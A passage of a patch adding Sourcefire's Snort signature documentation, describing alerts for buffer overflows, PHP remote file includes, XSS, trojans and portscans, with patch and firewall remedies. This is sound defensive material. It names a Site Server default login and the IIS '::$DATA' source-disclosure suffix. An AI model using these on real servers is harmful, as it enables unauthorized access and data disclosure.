+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/406.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+406
+
+--
+
+Summary:
+This event is generated when An ICMP Source Route Failed datagram is detected on the network.  
+
+--
+
+Impact:
+The datagram that generated with ICMP datagram failed to transverse the network.  This could be an indication of routing or network problems.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2704.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+2704
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+--
+Affected Systems:
+	Oracle iSQLPlus
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/721.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+721
+
+--
+Summary:
+This event is generated when network activity indicating possible virus
+infection is detected.
+
+--
+Impact:
+Malicious code infection.  This event may indicate that an internal host
+may be infected with some kind of malicious code.
+
+--
+Detailed Information:
+This event may indicate a possible virus infection of a host on the
+protected network.
+
+--
+Affected Systems:
+	Various systems
+
+--
+Attack Scenarios:
+Viruses may propogate in many different ways. Many arrive in the form of
+email attachments that an unsuspecting user may trigger by opening the
+attachment. Once infected, many viruses have the ability to use the
+infected host as a means of spreading copies of itself to other machines
+on the protected and external networks.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use antivirus software on hosts to terminate infectors.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000658.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000658
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "number" parameter in the "guestbook.php" 
+script used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/1470.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1470
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000334.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000334
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "CaLogic Calendars" application running on a webserver. Access to the file "reconfig.php" using a remote file being passed as the "CLPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "CLPath" parameter in the "reconfig.php" script used by the "CaLogic Calendars" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using CaLogic Calendars
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/676.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+NGSSoftware Advisory:
+http://www.nextgenss.com/advisories/mssql-jobs2.txt
+
+--
--- /dev/null
+++ b/doc/signatures/652.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+652
+
+--
+Summary:
+This event is generated when suspicious shell code is detected in
+network traffic.
+
+--
+Impact:
+Denial of Service (DoS) possible execution of arbitrary code.
+
+--
+Detailed Information:
+This event is generated when suspicious shell code is detected. Many
+buffer overflow attacks contain large numbers of NOOP instrucions to pad
+out the request. Other attacks contain specific shell code sequences
+directed at certain applications or services.
+
+The shellcode in question may also use Unicode encoding.
+
+--
+Affected Systems:
+	Any software running on x86 architecture.
+
+--
+Attack Scenarios:
+An attacker may exploit a DCERPC service by sending shellcode in the RPC
+data stream. Sending large amounts of data to the Microsoft Workstation
+service can cause a buffer overflow condition in the logging function
+thus presenting an attacker with the opportunity to issue a DoS attack
+or in some cases, to execute code of their choosing.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+False positives may be generated by binary file transfers.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Make sure the target host has all current patches applied and has the
+latest software versions installed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2985.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2176
+
+--
+Summary:
+This event is generated when an attempt is made to access a system
+file via SMB. 
+
+--
+Impact:
+Serious. This file contains important operating system information.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to access a file
+containing important operating system information using SMB across the
+network.
+
+--
+Affected Systems:
+Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If this file is accessible via SMB the attacker can manipulate the
+operating system registry settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
--- /dev/null
+++ b/doc/signatures/100000507.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000507
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "FlashChat" application running on a webserver. 
+Access to the file "adminips.php" using a remote file being passed as the 
+"banned_file" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "banned_file" parameter in the "adminips.php" script 
+used by the "FlashChat" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using FlashChat
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3226.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3226
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/160.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+159
+
+--
+Summary:
+This event is generated when incoming an data stream associated with the NetMetro Trojan Horse is detected.
+
+--
+Impact:
+Limited control of the target host.
+
+--
+Detailed Information:
+Due to the nature of this Trojan it is unlikely that the attacker's client IP address has been spoofed.
+
+The server portion opens TCP port 5031 by default to establish a connection between client and server. This event indicates that a host external to the protected network running a NetMetro Trojan Server is communicating with a host on the protected network that may be controlling the Trojan.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is named NMS.exe.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+A reboot of the infected machine is recommended. The Trojan does not start automatically at boot time nor does it change any system registry settings.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS79
+
+Dark-e:
+http://www.dark-e.com/archive/trojans/NetMetro/index.html
+
+--
--- /dev/null
+++ b/doc/signatures/975.txt
@@ -0,0 +1,66 @@
+Should be obsolete when httpinspect is used
+Rule:
+
+--
+Sid:
+975
+
+--
+Summary:
+This event is generated when an attempt is made to access an Active Server Page (ASP) .asp file to disclose its contents. 
+
+--
+Impact:
+Intelligence gathering activity.  A vulnerability exists that discloses the .asp file contents when the file name is appended with "::$DATA".
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) uses Active Server Page to supply HTML and server-side scripting.  ASP files use a .asp extension.  When the file name is appended with "::$DATA", the contents of the file are disclosed instead of executing the .asp file.
+
+--
+Affected Systems:
+Hosts running IIS 3.0, IIS 4.0
+
+--
+Attack Scenarios:
+An attacker can attempt to reference a .asp file appended with "::$DATA" to see the contents of the file.  Sensitive information may by disclosed depending on the selected file. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to a more current version of IIS.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft
+http://support.microsoft.com/default.aspx?scid=kb;EN-US;q188806
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0278
+
+Bugtraq
+http://www.securityfocus.com/bid/149
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10362
+
+--
--- /dev/null
+++ b/doc/signatures/3137.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3137
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
--- /dev/null
+++ b/doc/signatures/1818.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1818
+
+--
+Summary:
+This event is generated when an attempt is made to access files associated with Microsoft Site Server.
+
+--
+Impact:
+Information gathering.  This attack may permit leaking of information associated with particular Site Server files.
+
+--
+Detailed Information:
+Microsoft Site Server is software for Windows NT servers that allows users to publish, find, and share information.  There is a vulnerability that allows leaking of information of some Site Server files when an attacker logs on with the username of 'LDAP_AnonymousUser' and a password of 'LdapPassword_1'.
+
+--
+Affected Systems:
+Microsoft Site Server 3.0 
+
+--
+Attack Scenarios:
+An attacker can log on to Site Server using a default username and password to view Site Server files.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply Service Pack 4.
+
+
+--
+Contributors:
+Original rute writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11018
+
+--
--- /dev/null
+++ b/doc/signatures/100000811.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000811
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPBB" application running on a webserver. Access to the file "attach_rules.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "attach_rules.php" script used by the "PHPBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPBB
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2257.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft Windows Messenger service.
+
+--
+Impact:
+Serious. Denial of Service (DoS), execution of arbitrary code is
+possible.
+
+--
+Detailed Information:
+Due to improper length validation in the Microsoft Windows Messenger
+service, it may be possible for an attacker to overwrite portions of
+memory. This can result in the attacker being presented with the
+opportunity to execute code of their choosing. Under some circumstances
+a Denial of Service condition may be possible against the target host.
+
+Specifically, this vulnerability may present the attacker with the
+opportunity to execute code with the privileges of the local system
+account with full access to all resources on the target host.
+
+--
+Affected Systems:
+	Microsoft Windows NT Workstation 4.0, Service Pack 6a
+	Microsoft Windows NT Server 4.0, Service Pack 6a
+	Microsoft Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
+	Microsoft Windows 2000, Service Pack 2, Service Pack 3, Service Pack 4
+	Microsoft Windows XP Gold, Service Pack 1
+	Microsoft Windows XP 64-bit Edition
+	Microsoft Windows XP 64-bit Edition Version 2003
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2003 64-bit Edition
+
+--
+Attack Scenarios:
+The attacker may use one of the available exploits to target a
+vulnerable host.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+Disable the Windows messenger service
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/575892
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-043.asp
+
+--
--- /dev/null
+++ b/doc/signatures/122-22.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-22
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a udp
+filtered decoy portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/100000849.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+100000849
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "IceWarp" application running on a webserver. Access to the file "include.php" using a remote file being passed as the "language" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "language" parameter in the "include.php" script used by the "IceWarp" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using IceWarp
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3049.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3049
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3322.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3322
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
